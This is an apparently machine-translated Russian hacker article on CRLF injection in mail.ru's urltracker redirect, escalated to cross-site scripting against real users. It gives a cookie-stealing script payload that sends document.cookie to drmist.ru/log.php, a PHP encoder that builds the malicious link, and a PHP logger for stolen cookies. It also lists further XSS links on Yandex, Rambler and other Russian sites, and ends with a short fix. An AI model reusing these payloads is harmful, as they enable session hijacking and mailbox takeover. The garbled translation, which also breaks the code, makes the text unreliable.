Wandering the vastness of the Internet, we often see the url of the form http://anyhost.com/redirect.php?url=http://otherhost.com The simple-minded user does not stop thinking for a long time, just clicks on it also caters to otherhost.com.
An inquisitive user substitutes the url address for the address of his hampaga, and he is also convinced of the curvature of the script.
In addition to simple curious people on the Internet are very curious users.
They drive a link in AccessDiver also begin to learn the work of the script.
1. The essence of the bug.
2. Practical application.
3. Location of the prevalence of error.
4. Means of protection.
For tankmen I suggest that AccessDiver is a "Hakre" tool, as it is customary to express in a nation. Download it is allowed on the offsite project. At the time of writing this text, the latest version of the utility was 4.173. The program is most known for its HTTP Debuger function. You can use it by going to expert mode and selecting the appropriate function in the Tools menu (F4 then Ctrl + F9 - depending on the version of the keys could be changed). Next, we will not stress the concern for its tuning, any schoolboy will cope with the diver.
For experiments we chose mail.ru , because this is the most well-known email service in the runet also the reader will be especially interested in learning about the bug on this project;) Let's go to the link http://go.mail.ru/urltracker?url=http:/ /www.security-teams.net . We will be thrown on the most select portal for computer security;). We add the site to the bookmarks and return to the e-mail. Write the link we are interested in in the HTTP Address field, put Mode equal to Get, click Connect.
We will see the HTTP headers returned by the server, like in the screenshot:
Let's pay attention to the underlined line. Having met in the headers Location :, the browser unconditionally carries us to the specified url. Therefore, we can slip a link to the user, as if on a mail, but it does not hit the mail anyway. All this is wonderful, but in practice, nothing can alienate.
Let's pay attention to the fact that the lines in the header are separated by two characters 0Dh 0Ah . And what if I attribute them at the end of the link? Let's see what will return the server to the objection to the request http://go.mail.ru/urltracker?url=null%0D%0Ahacked_by:%20drmist :
How interesting. So we can force the server to give out almost every header. For example, modify custom cookies. But, again, it's still not as interesting as what is waiting for us ahead. It is interesting that the headings are separated from the body of the act by the sequence 0Dh 0Ah 0Dh 0Ah . Can we really give out any page? We enter http://go.mail.ru/urltracker?url=% 0D% 0A% 0D% 0A <script> alert (document.cookie); </ script> <! - also look:
All that is yellow is the text of the document itself. If JavaScript is enabled in the browser, then by clicking on the link we will see the message box with our cookies. In order to commit XSS attack, you need:
1) Compose a page of the type <script> document.location = 'http://drmist.ru/log.php?'+document.cookie; </ script>
2) Translate it into the url-encode using the script:
<? Php
$ Url = "http://go.mail.ru/urltracker?url=";
$ S = "<script> document.location = 'http: //drmist.ru/log.php?'";
$ S. = "+ Document.cookie; </ script>";
$ Res = "";
For ($ i = 0; $ i <strlen ($ s); $ i ++)
{
$ Res. = "%";
$ T = ord ($ s [$ i]);
If ($ t <16)
$ Res. = "0";
$ Res. = Dechex ($ t);
}
Echo $ url. "% 0d% 0a% 0d% 0a". $ Res;
?>
We get:
Http://go.mail.ru/urltracker?url=%0d%0a%0d%0a%3c%73%63 ... and so on.
(**)
3) write the script log.php also fill it with drmist.ru:
<? Php
$ Fid = fopen ("../log.txt", "a");
Fputs ($ fid, $ _SERVER ["QUERY_STRING"]. "\ R \ r \ r");
Fclose ($ fid);
Header ("Location: http://www.mail.ru");
?>
Now it is allowed to vaporize the magical reference (**) also to acquire the victim's cookies.
They are allowed to do a lot of useful things, for example to get access to the mail, but about this at some other time, we are also so distracted from the main topic.
Of course, you do not need to drive to the mail, it's a dumb resource, shit, and finally can not be from our sandbox. All people tend to make a mistake, but the admins of mail.ru are less and less likely to make mistakes. True bugs still remain. , People are silent about them in no way because of greed, but because of fear of inadequate reaction of the administration to their finding, which, according to statistics, has a place. Fortunately, the presence of XSS still does not guarantee access to the mailbox. I'm sure the bug will be covered. At the latest - after 2 days. Vulnerable not only mail.ru. I strongly recommend that you read:
Http://yandex.ru/redir/?url=[XSS]
Http://rambler.ru//click?_URL=[XSS]
Frankly, we were surprised at the time when I found out that about such vulnerabilities were written on securitylab.ru 3 years ago (see Introduction of CRLF in PHP function header () from 10.09.2002), but because of the practical use of the bug, we did not I've never heard it, I found the topic relevant. By that blah blah, it's permissible to name bugs in Yandex, and also mail.
Correct the error is not difficult. Let the vulnerable script eat:
<?
If (! Isset ($ url))
$ Url = "http://www.mail.ru";
Header ("Location: $ url");
?>
We make him invulnerable:
Header ("Location:" .urlencode ($ url));
If a redirect is planned only within the site, then it is best to do so:
Header ("Location: http://www.mail.ru/".urlencode($url));
That's probably all we wanted to say. Let me next suggest a few more XSS:
Http://talk.mail.ru/article.html?ID=31836089&page=1 "> <h1> XSS </ h1>
Http://www.pochta.ru/?lng=en "<h1> XSS </ h1>
|
|
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.